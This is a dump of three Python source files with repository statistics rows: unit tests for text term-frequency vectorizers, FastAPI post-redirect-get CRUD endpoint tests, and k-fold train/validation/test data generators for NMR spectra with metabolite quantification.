#Output excpected to be smaller in size than the input terms-list but same in size to the input Vocabulary.
self.assertTrue( np.all(w3grams_f_sparse.toarray() == self.expected_w3grams_f_sparse_smallVocab.toarray()) )
def test_trms2f_sparse_w3grams_largeVocab(self):
w3grams_f_sparse = trms2f_sparse( self.s2ngl_w3grams.terms_lst( self.txt_sample ),\
tid_vocabulary=self.w3grams_tid_vocab_large, norm_func=None, ndtype=np.float32 )
#Output excpected to be larger in size than the input terms-list but same in size to the input Vocabulary.
#terms-poisition of terms not inlcuded in terms-list being setted to zero.
self.assertTrue( np.all(w3grams_f_sparse.toarray() == self.expected_w3grams_f_sparse_largeVocab.toarray()) )
#trms2f_narray"
def test_trms2f_narray_c3grams_NoVocab(self):
with self.assertRaises(ValueError):
cngrams_f_narray = trms2f_narray( self.s2ngl_c3grams.terms_lst( self.txt_sample ),\
tid_vocabulary=None, norm_func=None, ndtype=np.float32 )
def test_trms2f_narray_c3grams_Vocab(self):
cngrams_f_narray = trms2f_narray( self.s2ngl_c3grams.terms_lst( self.txt_sample ),\
tid_vocabulary=self.c3grams_tid_vocab, norm_func=None, ndtype=np.float32 )
self.assertTrue( np.all(cngrams_f_narray == self.expected_c3grams_f_narray_Vocab) )
def test_trms2f_narray_c3grams_smallVocab(self):
cngrams_f_narray = trms2f_narray( self.s2ngl_c3grams.terms_lst( self.txt_sample ),\
tid_vocabulary=self.c3grams_tid_vocab_small, norm_func=None, ndtype=np.float32 )
self.assertTrue( np.all(cngrams_f_narray == self.expected_c3grams_f_narray_smallVocab) )
def test_trms2f_narray_c3grams_largeVocab(self):
cngrams_f_narray = trms2f_narray( self.s2ngl_c3grams.terms_lst( self.txt_sample ),\
tid_vocabulary=self.c3grams_tid_vocab_large, norm_func=None, ndtype=np.float32 )
self.assertTrue( np.all(cngrams_f_narray == self.expected_c3grams_f_narray_largeVocab) )
def test_trms2f_narray_words_NoVocab(self):
with self.assertRaises(ValueError):
words_f_narray = trms2f_narray( self.s2ngl_words.terms_lst( self.txt_sample ),\
tid_vocabulary=None, norm_func=None, ndtype=np.float32 )
def test_trms2f_narray_words_Vocab(self):
words_f_narray = trms2f_narray( self.s2ngl_words.terms_lst( self.txt_sample ),\
tid_vocabulary=self.words_tid_vocab, norm_func=None, ndtype=np.float32 )
self.assertTrue( np.all(words_f_narray == self.expected_words_f_narray_Vocab) )
def test_trms2f_narray_words_smallVocab(self):
words_f_narray = trms2f_narray( self.s2ngl_words.terms_lst( self.txt_sample ),\
tid_vocabulary=self.words_tid_vocab_small, norm_func=None, ndtype=np.float32 )
self.assertTrue( np.all(words_f_narray == self.expected_words_f_narray_smallVocab) )
def test_trms2f_narray_words_largeVocab(self):
words_f_narray = trms2f_narray( self.s2ngl_words.terms_lst( self.txt_sample ),\
tid_vocabulary=self.words_tid_vocab_large, norm_func=None, ndtype=np.float32 )
self.assertTrue( np.all(words_f_narray == self.expected_words_f_narray_largeVocab) )
def test_trms2f_narray_w3grams_NoVocab(self):
with self.assertRaises(ValueError):
w3grams_f_narray = trms2f_narray( self.s2ngl_w3grams.terms_lst( self.txt_sample ),\
tid_vocabulary=None, norm_func=None, ndtype=np.float32 )
def test_trms2f_narray_w3grams_Vocab(self):
w3grams_f_narray = trms2f_narray( self.s2ngl_w3grams.terms_lst( self.txt_sample ),\
tid_vocabulary=self.w3grams_tid_vocab, norm_func=None, ndtype=np.float32 )
self.assertTrue( np.all(w3grams_f_narray == self.expected_w3grams_f_narray_Vocab) )
def test_trms2f_narray_w3grams_smallVocab(self):
w3grams_f_narray = trms2f_narray( self.s2ngl_w3grams.terms_lst( self.txt_sample ),\
tid_vocabulary=self.w3grams_tid_vocab_small, norm_func=None, ndtype=np.float32 )
self.assertTrue( np.all(w3grams_f_narray == self.expected_w3grams_f_narray_smallVocab) )
def test_trms2f_narray_w3grams_largeVocab(self):
w3grams_f_narray = trms2f_narray( self.s2ngl_w3grams.terms_lst( self.txt_sample ),\
tid_vocabulary=self.w3grams_tid_vocab_large, norm_func=None, ndtype=np.float32 )
self.assertTrue( np.all(w3grams_f_narray == self.expected_w3grams_f_narray_largeVocab) )
"""
# Assemble the Test_BaseString2TF cases and run them with per-test output.
loader = unittest.TestLoader()
runner = unittest.TextTestRunner(verbosity=2)
runner.run(loader.loadTestsFromTestCase(Test_BaseString2TF))
| 49.639759
| 141
| 0.544841
| 6,420
| 41,201
| 3.333178
| 0.057477
| 0.07019
| 0.069536
| 0.081125
| 0.91093
| 0.849245
| 0.820786
| 0.800598
| 0.761998
| 0.725361
| 0
| 0.104563
| 0.266498
| 41,201
| 829
| 142
| 49.699638
| 0.603521
| 0.012087
| 0
| 0.378453
| 0
| 0.002762
| 0.191134
| 0.041167
| 0
| 0
| 0
| 0
| 0.002762
| 0
| null | null | 0
| 0.019337
| null | null | 0.002762
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
a1f296bc2c9b1b16cb83e06aa2967f255fe13c27
| 8,452
|
py
|
Python
|
tests/test_implementations/test_memory_sqlalchemy/api_async_test/test_post_redirect_get_api.py
|
aebrahim/FastAPIQuickCRUD
|
5c4d1bea2203c30eb21557f18bf9016b55fffa60
|
[
"MIT"
] | 123
|
2021-08-17T01:54:12.000Z
|
2022-03-29T20:41:56.000Z
|
tests/test_implementations/test_memory_sqlalchemy/api_async_test/test_post_redirect_get_api.py
|
aebrahim/FastAPIQuickCRUD
|
5c4d1bea2203c30eb21557f18bf9016b55fffa60
|
[
"MIT"
] | 10
|
2021-12-28T21:34:20.000Z
|
2022-03-16T13:31:24.000Z
|
tests/test_implementations/test_memory_sqlalchemy/api_async_test/test_post_redirect_get_api.py
|
aebrahim/FastAPIQuickCRUD
|
5c4d1bea2203c30eb21557f18bf9016b55fffa60
|
[
"MIT"
] | 10
|
2021-08-17T07:37:36.000Z
|
2022-03-31T13:16:55.000Z
|
import json
import uuid
from datetime import date, timedelta, datetime, timezone
from http import HTTPStatus
from starlette.testclient import TestClient
from src.fastapi_quickcrud import CrudMethods
from src.fastapi_quickcrud import crud_router_builder
from src.fastapi_quickcrud import sqlalchemy_to_pydantic
from tests.test_implementations.test_memory_sqlalchemy.api_test import app, UntitledTable256
# Build three routers against the same table model:
#  1) POST-redirect-GET under /test_post_direct_get
#  2) FIND_ONE (the GET target of the redirect) under the same prefix
#  3) POST-redirect-GET under a prefix with NO matching GET route, to test
#     the not-found-after-redirect path.
UntitledTable256Model = sqlalchemy_to_pydantic(UntitledTable256,
                                               crud_methods=[
                                                   CrudMethods.POST_REDIRECT_GET
                                               ],
                                               exclude_columns=['bytea_value', 'xml_value', 'box_valaue'])
test_post_and_redirect_get = crud_router_builder(db_model=UntitledTable256,
                                                 crud_models=UntitledTable256Model,
                                                 prefix="/test_post_direct_get",
                                                 tags=["test"],
                                                 async_mode=True
                                                 )
UntitledTable256Model = sqlalchemy_to_pydantic(UntitledTable256,
                                               crud_methods=[
                                                   CrudMethods.FIND_ONE
                                               ],
                                               exclude_columns=['bytea_value', 'xml_value', 'box_valaue'])
test_get_data = crud_router_builder(db_model=UntitledTable256,
                                    crud_models=UntitledTable256Model,
                                    prefix="/test_post_direct_get",
                                    tags=["test"],
                                    async_mode=True
                                    )
UntitledTable256Model = sqlalchemy_to_pydantic(UntitledTable256,
                                               crud_methods=[
                                                   CrudMethods.POST_REDIRECT_GET
                                               ],
                                               exclude_columns=['bytea_value', 'xml_value', 'box_valaue'])
test_post_and_redirect_get_without_get = crud_router_builder(db_model=UntitledTable256,
                                                             crud_models=UntitledTable256Model,
                                                             prefix="/test_post_direct_get_without_get",
                                                             tags=["test"],
                                                             async_mode=True
                                                             )
# Register every router on the app. A plain for-loop replaces the original
# side-effect-only list comprehension, which built and discarded a list of
# None values.
for router in (test_post_and_redirect_get, test_get_data, test_post_and_redirect_get_without_get):
    app.include_router(router)
client = TestClient(app)
primary_key_name = UntitledTable256.primary_key_of_table
unique_fields = UntitledTable256.unique_fields
# Post Redirect Get API Test
def test_create_one_but_no_follow_redirect():
    """POST a record without following redirects; expect 303 See Other."""
    request_headers = {'accept': '*/*', 'Content-Type': 'application/json'}
    payload = '{ "bool_value": true, "char_value": "string", "date_value": "2021-07-24", "float4_value": 0, "float8_value": 0, "int2_value": 0, "int4_value": 0, "int8_value": 0, "interval_value": 0, "json_value": {}, "jsonb_value": {}, "numeric_value": 0, "text_value": "string", "timestamp_value": "2021-07-24T02:54:53.285Z", "timestamptz_value": "2021-07-24T02:54:53.285Z", "uuid_value": "3fa85f64-5717-4562-b3fc-2c963f66afa6", "varchar_value": "string", "array_value": [ 0 ], "array_str__value": [ "string" ] }'
    resp = client.post('/test_post_direct_get',
                       headers=request_headers,
                       data=payload,
                       allow_redirects=False)
    assert resp.status_code == HTTPStatus.SEE_OTHER
def test_create_one_with_redirect():
    """POST a full record and follow the 303 redirect to its GET endpoint.

    Expects a 200 response whose JSON body contains the table's primary key;
    the created record is returned so other tests can reuse it.
    """
    request_headers = {'accept': '*/*', 'Content-Type': 'application/json'}
    # One value per column type, built directly as a dict literal (the
    # original assigned each value to an intermediate variable first).
    payload = {
        'bool_value': False,
        'char_value': "test",
        'date_value': str(date.today() - timedelta(days=1)),
        'float8_value': 0.1,
        'int2_value': 100,
        'int8_value': 100,
        'float4_value': 0.4,
        'int4_value': 4,
        'interval_value': float(5400),
        'json_value': {"hello": "world"},
        'jsonb_value': {"hello": "world"},
        'numeric_value': 19.0,
        'text_value': 'hello world',
        'time_value': '18:18:18',
        'timestamp_value': str(datetime.utcnow().isoformat()),
        'timestamptz_value': str(datetime.utcnow().replace(tzinfo=timezone.utc).isoformat()),
        'timetz_value': '18:18:18+00:00',
        'uuid_value': str(uuid.uuid4()),
        'varchar_value': 'hello world',
        'array_value': [1, 2, 3, 4],
        'array_str__value': ['1', '2', '3', '4'],
    }
    resp = client.post('/test_post_direct_get',
                       headers=request_headers,
                       data=json.dumps(payload),
                       allow_redirects=True)
    assert resp.status_code == HTTPStatus.OK
    body = resp.json()
    assert primary_key_name in body
    return body
def test_create_but_conflict():
    """Re-posting an already-created row must yield 409 CONFLICT."""
    existing_row = test_create_one_with_redirect()
    response = client.post(
        '/test_post_direct_get',
        headers={'accept': '*/*', 'Content-Type': 'application/json'},
        data=json.dumps(existing_row),
        allow_redirects=True,
    )
    assert response.status_code == HTTPStatus.CONFLICT
def test_create_but_not_found_get_api():
    """POST to an endpoint whose redirect-target GET API does not exist.

    The create itself is valid, but the follow-up GET is missing, so the
    server must answer 404 NOT FOUND.
    """
    # Same column coverage as test_create_one_with_redirect (numeric is an
    # int here, matching the original test data).
    payload = {
        'bool_value': False,
        'char_value': "test",
        'date_value': str(date.today() - timedelta(days=1)),
        'float8_value': 0.1,
        'int2_value': 100,
        'int8_value': 100,
        'float4_value': 0.4,
        'int4_value': 4,
        'interval_value': float(5400),
        'json_value': {"hello": "world"},
        'jsonb_value': {"hello": "world"},
        'numeric_value': 19,
        'text_value': 'hello world',
        'time_value': '18:18:18',
        'timestamp_value': str(datetime.utcnow().isoformat()),
        'timestamptz_value': str(datetime.utcnow().replace(tzinfo=timezone.utc).isoformat()),
        'timetz_value': '18:18:18+00:00',
        'uuid_value': str(uuid.uuid4()),
        'varchar_value': 'hello world',
        'array_value': [1, 2, 3, 4],
        'array_str__value': ['1', '2', '3', '4'],
    }
    response = client.post(
        '/test_post_direct_get_without_get',
        headers={'accept': '*/*', 'Content-Type': 'application/json'},
        data=json.dumps(payload),
        allow_redirects=True,
    )
    assert response.status_code == HTTPStatus.NOT_FOUND
| 43.122449
| 511
| 0.635353
| 942
| 8,452
| 5.301486
| 0.154989
| 0.167401
| 0.122547
| 0.03364
| 0.817381
| 0.788747
| 0.781137
| 0.754305
| 0.754305
| 0.734081
| 0
| 0.036847
| 0.261477
| 8,452
| 195
| 512
| 43.34359
| 0.763217
| 0.003076
| 0
| 0.717791
| 0
| 0.006135
| 0.184635
| 0.031346
| 0
| 0
| 0
| 0
| 0.030675
| 1
| 0.02454
| false
| 0
| 0.055215
| 0
| 0.08589
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
b821f79b42df0a7d7e510fc1784ba397079fd985
| 18,563
|
py
|
Python
|
train_with_your_data/scripts/cpmg/automated_metabolite_quantification/data_generators.py
|
ciceklab/targeted_brain_tumor_margin_assessment
|
2cf729019dfc1785992208a69c353a659c9b6448
|
[
"MIT"
] | 1
|
2021-12-11T20:06:39.000Z
|
2021-12-11T20:06:39.000Z
|
train_with_your_data/scripts/cpmg/automated_metabolite_quantification/data_generators.py
|
ciceklab/targeted_brain_tumor_margin_assessment
|
2cf729019dfc1785992208a69c353a659c9b6448
|
[
"MIT"
] | null | null | null |
train_with_your_data/scripts/cpmg/automated_metabolite_quantification/data_generators.py
|
ciceklab/targeted_brain_tumor_margin_assessment
|
2cf729019dfc1785992208a69c353a659c9b6448
|
[
"MIT"
] | 2
|
2021-12-15T18:17:17.000Z
|
2021-12-16T12:08:30.000Z
|
import pdb
import pickle
import pandas as pd
import os
import numpy as np
import sys
sys.path.insert(1,"../")
sys.path.insert(1,"../../")
sys.path.insert(1,"../../../")
from config_u import base
project_base_path = base
current_path = "scripts/cpmg/automated_metabolite_quantification/"
sys.path.insert(1, os.path.join(project_base_path, current_path))
from data_utils import split_to_kfold, spectrum2ppm, spectrum_peak_unit_quantification
''' Custom data generator functions for fold generation with no patient and sample overlap'''
# Option #1.A: only valid PC and fully quantified samples (train, vald and test)
def cpmg_generator_1A(k, fold_dct, statistics, spectra, ppm_spectra, quant, class_labels):
    """Yield k train/validation/test splits with no patient/sample overlap.

    For iteration i, fold i is the test fold, fold (i+1) % k the validation
    fold, and all remaining folds form the training fold.

    Args:
        k: number of folds.
        fold_dct: maps str(fold_index) -> list of sample row indices.
        statistics: pandas DataFrame of per-sample metadata, row-aligned
            with the arrays below.
        spectra, ppm_spectra, quant, class_labels: 2-D arrays indexable by
            row lists.

    Yields:
        (train_idx, vald_idx, test_idx, train_fold, vald_fold, test_fold,
        all_data); each fold dict has keys "spectra", "quant",
        "ppm_spectra", "class_labels", "stats".
    """
    def _subset(idx):
        # Row-slice every data matrix for one fold; stats get a fresh index.
        return {
            "spectra": spectra[idx, :],
            "quant": quant[idx, :],
            "ppm_spectra": ppm_spectra[idx, :],
            "class_labels": class_labels[idx, :],
            "stats": statistics.iloc[idx, :].reset_index(drop=True),
        }

    all_data = {
        "spectra": spectra,
        "quant": quant,
        "ppm_spectra": ppm_spectra,
        "class_labels": class_labels,
        "stats": statistics,
    }
    for cur_iter in range(k):
        test_fold_idx = fold_dct[str(cur_iter)]
        vald_fold_idx = fold_dct[str((cur_iter + 1) % k)]
        # Generalized over k: the original concatenated exactly three
        # remaining folds by hand, silently assuming k == 5.
        train_fold_indices = [i for i in range(k)
                              if i not in (cur_iter, (cur_iter + 1) % k)]
        train_fold_idx = [s for i in train_fold_indices for s in fold_dct[str(i)]]
        yield (train_fold_idx, vald_fold_idx, test_fold_idx,
               _subset(train_fold_idx), _subset(vald_fold_idx),
               _subset(test_fold_idx), all_data)
# Option #1.B: only valid PC and fully quantified samples (train and test)
def cpmg_generator_1B(k, fold_dct, statistics, spectra, ppm_spectra, quant, class_labels):
    """Yield k train/test splits (no validation fold) with no overlap.

    For iteration i, fold i is the test fold and all remaining folds form
    the training fold.

    Args:
        k: number of folds.
        fold_dct: maps str(fold_index) -> list of sample row indices.
        statistics: pandas DataFrame of per-sample metadata, row-aligned.
        spectra, ppm_spectra, quant, class_labels: 2-D arrays.

    Yields:
        (train_idx, test_idx, train_fold, test_fold, all_data).
    """
    def _subset(idx):
        # Row-slice every data matrix for one fold; stats get a fresh index.
        return {
            "spectra": spectra[idx, :],
            "quant": quant[idx, :],
            "ppm_spectra": ppm_spectra[idx, :],
            "class_labels": class_labels[idx, :],
            "stats": statistics.iloc[idx, :].reset_index(drop=True),
        }

    all_data = {
        "spectra": spectra,
        "quant": quant,
        "ppm_spectra": ppm_spectra,
        "class_labels": class_labels,
        "stats": statistics,
    }
    for cur_iter in range(k):
        test_fold_idx = fold_dct[str(cur_iter)]
        # Generalized over k: the original concatenated exactly four
        # remaining folds by hand, silently assuming k == 5.
        train_fold_indices = [i for i in range(k) if i != cur_iter]
        train_fold_idx = [s for i in train_fold_indices for s in fold_dct[str(i)]]
        yield (train_fold_idx, test_fold_idx,
               _subset(train_fold_idx), _subset(test_fold_idx), all_data)
# Option #2.A: valid PC and fully quantified samples form test folds
# but invalid samples are injected to the training dataset by hand (train, vald and test)
def cpmg_generator_2A(k, fold_dct, valid_statistics, valid_spectra, valid_ppm_spectra, valid_quant, valid_class_labels,
                      invalid_statistics, invalid_spectra, invalid_ppm_spectra, invalid_quant):
    """Yield k train/vald/test splits; invalid samples augment training only.

    Valid (fully quantified) samples form the test and validation folds.
    The invalid samples are appended to every training fold with class
    label -1.

    Bug fixes versus the original:
      * fold data was read from undefined globals (``spectra`` etc.)
        instead of the ``valid_*`` parameters (NameError);
      * ``np.concat`` replaced with the portable ``np.concatenate``;
      * class labels are concatenated along axis 0 (rows = samples), not
        axis 1;
      * fold assembly no longer assumes k == 5.

    Yields:
        (train_idx, vald_idx, test_idx, train_fold, vald_fold, test_fold,
        all_data).
    """
    def _subset(idx):
        # Row-slice the *valid* data matrices for one fold.
        return {
            "spectra": valid_spectra[idx, :],
            "quant": valid_quant[idx, :],
            "ppm_spectra": valid_ppm_spectra[idx, :],
            "class_labels": valid_class_labels[idx, :],
            "stats": valid_statistics.iloc[idx, :].reset_index(drop=True),
        }

    invalid_sample_cnt = invalid_spectra.shape[0]
    # Injected invalid samples are labelled -1 ("invalid" class).
    invalid_labels = np.array([-1] * invalid_sample_cnt).reshape((-1, 1))
    all_data = {
        "spectra": valid_spectra,
        "quant": valid_quant,
        "ppm_spectra": valid_ppm_spectra,
        "class_labels": valid_class_labels,
        "stats": valid_statistics,
    }
    for cur_iter in range(k):
        test_fold_idx = fold_dct[str(cur_iter)]
        vald_fold_idx = fold_dct[str((cur_iter + 1) % k)]
        train_fold_indices = [i for i in range(k)
                              if i not in (cur_iter, (cur_iter + 1) % k)]
        train_fold_idx = [s for i in train_fold_indices for s in fold_dct[str(i)]]
        # Invalid samples are stacked below the valid training rows (axis 0).
        train_fold = {
            "spectra": np.concatenate((valid_spectra[train_fold_idx, :], invalid_spectra), axis=0),
            "quant": np.concatenate((valid_quant[train_fold_idx, :], invalid_quant), axis=0),
            "ppm_spectra": np.concatenate((valid_ppm_spectra[train_fold_idx, :], invalid_ppm_spectra), axis=0),
            "class_labels": np.concatenate((valid_class_labels[train_fold_idx, :], invalid_labels), axis=0),
            "stats": pd.concat([valid_statistics.iloc[train_fold_idx, :], invalid_statistics]).reset_index(drop=True),
        }
        yield (train_fold_idx, vald_fold_idx, test_fold_idx, train_fold,
               _subset(vald_fold_idx), _subset(test_fold_idx), all_data)
# Option #2.B: valid PC and fully quantified samples form test folds
# but invalid samples are injected to the training dataset by hand (train, vald and test)
def cpmg_generator_2B(k, fold_dct, valid_statistics, valid_spectra, valid_ppm_spectra, valid_quant, valid_class_labels,
                      invalid_statistics, invalid_spectra, invalid_ppm_spectra, invalid_quant):
    """Yield k train/test splits; invalid samples augment training only.

    Like 2A but with no validation fold: fold i is the test fold and all
    remaining valid folds plus every invalid sample (labelled -1) form the
    training fold.

    Bug fixes versus the original:
      * fold data was read from undefined globals (``spectra`` etc.)
        instead of the ``valid_*`` parameters (NameError);
      * ``np.concat`` replaced with the portable ``np.concatenate``;
      * class labels are concatenated along axis 0 (rows = samples), not
        axis 1;
      * fold assembly no longer assumes k == 5.

    Yields:
        (train_idx, test_idx, train_fold, test_fold, all_data).
    """
    def _subset(idx):
        # Row-slice the *valid* data matrices for one fold.
        return {
            "spectra": valid_spectra[idx, :],
            "quant": valid_quant[idx, :],
            "ppm_spectra": valid_ppm_spectra[idx, :],
            "class_labels": valid_class_labels[idx, :],
            "stats": valid_statistics.iloc[idx, :].reset_index(drop=True),
        }

    invalid_sample_cnt = invalid_spectra.shape[0]
    # Injected invalid samples are labelled -1 ("invalid" class).
    invalid_labels = np.array([-1] * invalid_sample_cnt).reshape((-1, 1))
    all_data = {
        "spectra": valid_spectra,
        "quant": valid_quant,
        "ppm_spectra": valid_ppm_spectra,
        "class_labels": valid_class_labels,
        "stats": valid_statistics,
    }
    for cur_iter in range(k):
        test_fold_idx = fold_dct[str(cur_iter)]
        train_fold_indices = [i for i in range(k) if i != cur_iter]
        train_fold_idx = [s for i in train_fold_indices for s in fold_dct[str(i)]]
        # Invalid samples are stacked below the valid training rows (axis 0).
        train_fold = {
            "spectra": np.concatenate((valid_spectra[train_fold_idx, :], invalid_spectra), axis=0),
            "quant": np.concatenate((valid_quant[train_fold_idx, :], invalid_quant), axis=0),
            "ppm_spectra": np.concatenate((valid_ppm_spectra[train_fold_idx, :], invalid_ppm_spectra), axis=0),
            "class_labels": np.concatenate((valid_class_labels[train_fold_idx, :], invalid_labels), axis=0),
            "stats": pd.concat([valid_statistics.iloc[train_fold_idx, :], invalid_statistics]).reset_index(drop=True),
        }
        yield (train_fold_idx, test_fold_idx, train_fold,
               _subset(test_fold_idx), all_data)
# Option #3.A: only valid PC samples form test folds (train, vald and test)
def cpmg_generator_3A(k, fold_dct, statistics, spectra, ppm_spectra, quant, quant_availability, class_labels):
    """Yield k train/validation/test splits, carrying quantification-availability masks.

    Same split scheme as 1A (fold i test, fold (i+1) % k validation, rest
    train) but every fold dict additionally contains the
    "quant_availability" matrix row-aligned with "quant".

    Yields:
        (train_idx, vald_idx, test_idx, train_fold, vald_fold, test_fold,
        all_data).
    """
    def _subset(idx):
        # Row-slice every data matrix for one fold; stats get a fresh index.
        return {
            "spectra": spectra[idx, :],
            "quant": quant[idx, :],
            "quant_availability": quant_availability[idx, :],
            "ppm_spectra": ppm_spectra[idx, :],
            "class_labels": class_labels[idx, :],
            "stats": statistics.iloc[idx, :].reset_index(drop=True),
        }

    all_data = {
        "spectra": spectra,
        "quant": quant,
        "quant_availability": quant_availability,
        "ppm_spectra": ppm_spectra,
        "class_labels": class_labels,
        "stats": statistics,
    }
    for cur_iter in range(k):
        test_fold_idx = fold_dct[str(cur_iter)]
        vald_fold_idx = fold_dct[str((cur_iter + 1) % k)]
        # Generalized over k: the original concatenated exactly three
        # remaining folds by hand, silently assuming k == 5.
        train_fold_indices = [i for i in range(k)
                              if i not in (cur_iter, (cur_iter + 1) % k)]
        train_fold_idx = [s for i in train_fold_indices for s in fold_dct[str(i)]]
        yield (train_fold_idx, vald_fold_idx, test_fold_idx,
               _subset(train_fold_idx), _subset(vald_fold_idx),
               _subset(test_fold_idx), all_data)
# Option #3.B: only valid PC samples form test folds (train and test)
def cpmg_generator_3B(k, fold_dct, statistics, spectra, ppm_spectra, quant, quant_availability, class_labels):
    """Yield k train/test splits, carrying quantification-availability masks.

    Same split scheme as 1B (fold i test, rest train) but every fold dict
    additionally contains the "quant_availability" matrix.

    Yields:
        (train_idx, test_idx, train_fold, test_fold, all_data).
    """
    def _subset(idx):
        # Row-slice every data matrix for one fold; stats get a fresh index.
        return {
            "spectra": spectra[idx, :],
            "quant": quant[idx, :],
            "quant_availability": quant_availability[idx, :],
            "ppm_spectra": ppm_spectra[idx, :],
            "class_labels": class_labels[idx, :],
            "stats": statistics.iloc[idx, :].reset_index(drop=True),
        }

    all_data = {
        "spectra": spectra,
        "quant": quant,
        "quant_availability": quant_availability,
        "ppm_spectra": ppm_spectra,
        "class_labels": class_labels,
        "stats": statistics,
    }
    for cur_iter in range(k):
        test_fold_idx = fold_dct[str(cur_iter)]
        # Generalized over k: the original concatenated exactly four
        # remaining folds by hand, silently assuming k == 5.
        train_fold_indices = [i for i in range(k) if i != cur_iter]
        train_fold_idx = [s for i in train_fold_indices for s in fold_dct[str(i)]]
        yield (train_fold_idx, test_fold_idx,
               _subset(train_fold_idx), _subset(test_fold_idx), all_data)
# Option #4.A: only valid PC samples form test folds
# but invalid pc samples are injected to the training dataset
def cpmg_generator_4A(k, fold_dct, valid_statistics, valid_spectra, valid_ppm_spectra, valid_quant, valid_quant_availability, valid_class_labels,
                      invalid_statistics, invalid_spectra, invalid_ppm_spectra, invalid_quant, invalid_quant_availability):
    """Yield k train/vald/test splits with availability masks; invalid samples augment training.

    Valid PC samples form the test and validation folds; invalid samples
    (labelled -1) are appended to every training fold.

    Bug fixes versus the original:
      * ``np.concat`` replaced with the portable ``np.concatenate``;
      * every sample concatenation now stacks along axis 0 (rows =
        samples) — axis 1 would raise on mismatched row counts;
      * training stats index is reset *after* the concat so it is unique
        (consistent with generator 2A);
      * fold assembly no longer assumes k == 5.

    Yields:
        (train_idx, vald_idx, test_idx, train_fold, vald_fold, test_fold,
        all_data).
    """
    def _subset(idx):
        # Row-slice the *valid* data matrices for one fold.
        return {
            "spectra": valid_spectra[idx, :],
            "quant": valid_quant[idx, :],
            "quant_availability": valid_quant_availability[idx, :],
            "ppm_spectra": valid_ppm_spectra[idx, :],
            "class_labels": valid_class_labels[idx, :],
            "stats": valid_statistics.iloc[idx, :].reset_index(drop=True),
        }

    invalid_sample_cnt = invalid_spectra.shape[0]
    # Injected invalid samples are labelled -1 ("invalid" class).
    invalid_labels = np.array([-1] * invalid_sample_cnt).reshape((-1, 1))
    all_data = {
        "spectra": valid_spectra,
        "quant": valid_quant,
        "quant_availability": valid_quant_availability,
        "ppm_spectra": valid_ppm_spectra,
        "class_labels": valid_class_labels,
        "stats": valid_statistics,
    }
    for cur_iter in range(k):
        test_fold_idx = fold_dct[str(cur_iter)]
        vald_fold_idx = fold_dct[str((cur_iter + 1) % k)]
        train_fold_indices = [i for i in range(k)
                              if i not in (cur_iter, (cur_iter + 1) % k)]
        train_fold_idx = [s for i in train_fold_indices for s in fold_dct[str(i)]]
        train_fold = {
            "spectra": np.concatenate((valid_spectra[train_fold_idx, :], invalid_spectra), axis=0),
            "quant": np.concatenate((valid_quant[train_fold_idx, :], invalid_quant), axis=0),
            "quant_availability": np.concatenate((valid_quant_availability[train_fold_idx, :], invalid_quant_availability), axis=0),
            "ppm_spectra": np.concatenate((valid_ppm_spectra[train_fold_idx, :], invalid_ppm_spectra), axis=0),
            "class_labels": np.concatenate((valid_class_labels[train_fold_idx, :], invalid_labels), axis=0),
            "stats": pd.concat([valid_statistics.iloc[train_fold_idx, :], invalid_statistics]).reset_index(drop=True),
        }
        yield (train_fold_idx, vald_fold_idx, test_fold_idx, train_fold,
               _subset(vald_fold_idx), _subset(test_fold_idx), all_data)
# Option #4.B: only valid PC samples form test folds
# but invalid pc samples are injected to the training dataset
def cpmg_generator_4B(k, fold_dct, valid_statistics, valid_spectra, valid_ppm_spectra, valid_quant, valid_quant_availability, valid_class_labels,
                      invalid_statistics, invalid_spectra, invalid_ppm_spectra, invalid_quant, invalid_quant_availability):
    """Yield k train/test splits with availability masks; invalid samples augment training.

    Like 4A but with no validation fold: fold i is the test fold; all
    remaining valid folds plus every invalid sample (labelled -1) form the
    training fold.

    Bug fixes versus the original:
      * ``np.concat`` replaced with the portable ``np.concatenate``;
      * every sample concatenation now stacks along axis 0 (rows =
        samples) — axis 1 would raise on mismatched row counts;
      * training stats index is reset *after* the concat so it is unique
        (consistent with generator 2B);
      * fold assembly no longer assumes k == 5.

    Yields:
        (train_idx, test_idx, train_fold, test_fold, all_data).
    """
    def _subset(idx):
        # Row-slice the *valid* data matrices for one fold.
        return {
            "spectra": valid_spectra[idx, :],
            "quant": valid_quant[idx, :],
            "quant_availability": valid_quant_availability[idx, :],
            "ppm_spectra": valid_ppm_spectra[idx, :],
            "class_labels": valid_class_labels[idx, :],
            "stats": valid_statistics.iloc[idx, :].reset_index(drop=True),
        }

    invalid_sample_cnt = invalid_spectra.shape[0]
    # Injected invalid samples are labelled -1 ("invalid" class).
    invalid_labels = np.array([-1] * invalid_sample_cnt).reshape((-1, 1))
    all_data = {
        "spectra": valid_spectra,
        "quant": valid_quant,
        "quant_availability": valid_quant_availability,
        "ppm_spectra": valid_ppm_spectra,
        "class_labels": valid_class_labels,
        "stats": valid_statistics,
    }
    for cur_iter in range(k):
        test_fold_idx = fold_dct[str(cur_iter)]
        train_fold_indices = [i for i in range(k) if i != cur_iter]
        train_fold_idx = [s for i in train_fold_indices for s in fold_dct[str(i)]]
        train_fold = {
            "spectra": np.concatenate((valid_spectra[train_fold_idx, :], invalid_spectra), axis=0),
            "quant": np.concatenate((valid_quant[train_fold_idx, :], invalid_quant), axis=0),
            "quant_availability": np.concatenate((valid_quant_availability[train_fold_idx, :], invalid_quant_availability), axis=0),
            "ppm_spectra": np.concatenate((valid_ppm_spectra[train_fold_idx, :], invalid_ppm_spectra), axis=0),
            "class_labels": np.concatenate((valid_class_labels[train_fold_idx, :], invalid_labels), axis=0),
            "stats": pd.concat([valid_statistics.iloc[train_fold_idx, :], invalid_statistics]).reset_index(drop=True),
        }
        yield (train_fold_idx, test_fold_idx, train_fold,
               _subset(test_fold_idx), all_data)
| 53.037143
| 185
| 0.674999
| 2,539
| 18,563
| 4.523434
| 0.0449
| 0.13165
| 0.057466
| 0.057466
| 0.965259
| 0.964824
| 0.959512
| 0.952111
| 0.9266
| 0.917632
| 0
| 0.007166
| 0.195604
| 18,563
